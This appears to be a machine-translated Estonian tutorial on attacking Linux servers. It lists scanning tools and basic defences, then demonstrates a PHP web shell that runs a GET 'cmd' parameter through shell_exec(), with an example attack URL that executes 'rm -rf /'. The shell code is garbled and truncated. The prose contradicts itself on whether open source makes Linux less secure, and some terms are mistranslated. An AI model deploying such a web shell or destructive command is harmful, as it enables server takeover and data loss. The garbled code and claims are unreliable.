Linux on enimkasutatav serverite operatsioonisüsteem, eriti veebiserverite jaoks. See on avatud lähtekoodiga; see tähendab, et kellelgi on juurdepääs lähtekoodile. See muudab selle teiste operatsioonisüsteemidega võrreldes vähem turvaliseks, kuna ründajad saavad haavatavuste leidmiseks lähtekoodi uurida . Linux häkkerite jaoks on nende haavatavuste ärakasutamine süsteemile volitamata juurdepääsu saamiseks.
Selles artiklis tutvustame teile, mis on Linux, selle turvaauke, Ubuntu abil häkkimist ja vastumeetmeid, mida saate rakendada.
Selles õpetuses käsitletud teemad
- Kiire märkus Linuxis
- Linuxi häkkimistööriistad
- Kuidas vältida Linuxi häkkimist
- Häkkimistegevus: häkkige Linuxi süsteem PHP abil
Kiire märkus Linuxis
Linux on avatud lähtekoodiga operatsioonisüsteem . Linuxi-põhiseid operatsioonisüsteeme, nagu Redhat, Fedora, Ubuntu jne, on palju jaotus. Erinevalt teistest opsüsteemidest pole Linux turvalisuse osas vähem turvaline. Selle põhjuseks on see, et lähtekood on vabalt saadaval, seega on seda lihtne haavatavuste osas uurida ja neid teiste opsüsteemidega, mis pole avatud lähtekoodiga, kasutada. Linuxit saab kasutada serveri, lauaarvuti, tahvelarvuti või mobiilseadme operatsioonisüsteemina.
Linuxi programme saab kasutada kas GUI või käskude abil. Kali Linuxi häkkimise Linuxi käsud on graafilise kasutajaliidese kasutamisega võrreldes tõhusamad. Sel põhjusel aitab teada Linuxi põhilisi käske häkkimiseks.
Kali Linuxi häkkidega alustamise kohta vaadake neid juhendajaid https://www.guru99.com/unix-linux-tutorial.html.
Linuxi häkkimistööriistad
- Nessus - seda tööriista saab kasutada Ubuntu häkkimise, skannimise konfiguratsiooniseadete, plaastrite ja võrkude jms jaoks. Selle leiate aadressilt https://www.tenable.com/products/nessus
- NMap. Seda tööriista saab kasutada serveris töötavate hostide ja nende kasutatavate teenuste jälgimiseks. Seda saab kasutada ka sadamate otsimiseks. Selle leiate aadressilt https://nmap.org/
- SARA - SARA on turvaaudiitori teadusassistendi lühend. Nagu nimigi ütleb, saab seda tööriista kasutada võrkude kontrollimiseks selliste ohtude vastu nagu SQL Injection, XSS jne. Selle leiate aadressilt http://www-arc.com/sara/sara.html
Ülaltoodud loetelu ei ole täielik; see annab teile ülevaate Ubuntu häkkimise ja Linuxi süsteemide häkkimise võimalustest.
Kuidas vältida Linuxi häkkimist
Linuxi häkkimine kasutab ära operatsioonisüsteemi haavatavusi. Organisatsioon võib selliste rünnakute eest kaitsmiseks rakendada järgmist poliitikat.
- Plaasterhaldus - plaastrid parandavad vigu, mida ründajad kasutavad süsteemi kahjustamiseks. Hea plaastrite halduspoliitika tagab, et rakendate oma süsteemis pidevalt asjakohaseid plaastreid.
- Õige OS-i konfiguratsioon - muud ärakasutused kasutavad ära serveri konfiguratsiooni nõrkusi. Mitteaktiivsed kasutajanimed ja deemonid tuleks keelata. Vaikeseadeid, nagu rakenduse tavalised paroolid, vaikenimed ja mõned pordinumbrid, tuleks muuta.
- Sissetungimise tuvastamise süsteem - selliseid tööriistu saab kasutada süsteemile volitamata juurdepääsu tuvastamiseks. Mõni tööriist suudab selliseid rünnakuid tuvastada ja ära hoida.
Häkkimistegevus: häkkige PHP abil Ubuntu Linuxi süsteem
Selles praktilises stsenaariumis õpime, kuidas Ubuntu abil häkkida, ja pakume teile põhiteavet selle kohta, kuidas saate PHP-d Linuxi ohtu seada. Me ei kavatse ühtegi ohvrit sihtida. Kui soovite seda proovida, võite LAMPPi installida oma kohalikku masinasse.
PHP-l on kaks funktsiooni, mida saab kasutada Linuxi häkkimise käskude täitmiseks. Sellel on funktsioonid exec () ja shell_exec (). Funktsioon exec () tagastab käsu väljundi viimase rea, shell_exec () aga kogu käsu tulemuse stringina.
Eeldame, et ründajahaldurid laadivad järgmise faili veebiserverisse üles.
$cmd";$output = shell_exec($cmd);echo "$output";?>
SIIN,
Ülaltoodud skript saab käsu GET muutujast nimega cmd. Käsk käivitatakse shell_exec () abil ja tulemused tagastatakse brauseris.
Ülaltoodud koodi saab kasutada järgmise URL-i abil
http: //localhost/cp/konsole.php? cmd = ls% 20-l
SIIN,
- „… Konsole.php? Cmd = ls% 20-l” määrab muutujale cmd väärtuse ls -l .
Serveri vastu häkkimise käsk Ubuntu täidetakse järgmiselt
shell_exec('ls -l') ;
Ülaltoodud koodi käivitamine veebiserveris annab järgmistele sarnaseid tulemusi.
Ülaltoodud käsk kuvab lihtsalt praeguses kataloogis olevad failid ja õigused
Oletame, et ründaja annab järgmise käsu
rm -rf /
SIIN,
- “Rm” eemaldab failid
- “Rf” paneb rm-käsu käitama rekursiivses režiimis. Kõigi kaustade ja failide kustutamine
- “/” Käsib käsku failide kustutamiseks juurkataloogist
Rünnaku URL näeks välja umbes selline
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Kokkuvõte
- Linux on populaarne serverite, lauaarvutite, tahvelarvutite ja mobiilseadmete operatsioonisüsteem.
- Linux on avatud lähtekoodiga ja lähtekoodi saab igaüks. Nii on haavatavusi lihtne tuvastada. See on üks häkkerite parimatest operatsioonisüsteemidest.
- Ubuntu põhilised ja võrguhäkkimise käsud on Linuxi häkkerite jaoks väärtuslikud.
- Haavatavused on nõrkus, mida saab süsteemi kompromiteerimiseks kasutada.
- Hea turvalisus aitab kaitsta süsteemi ründaja ohtu sattumise eest.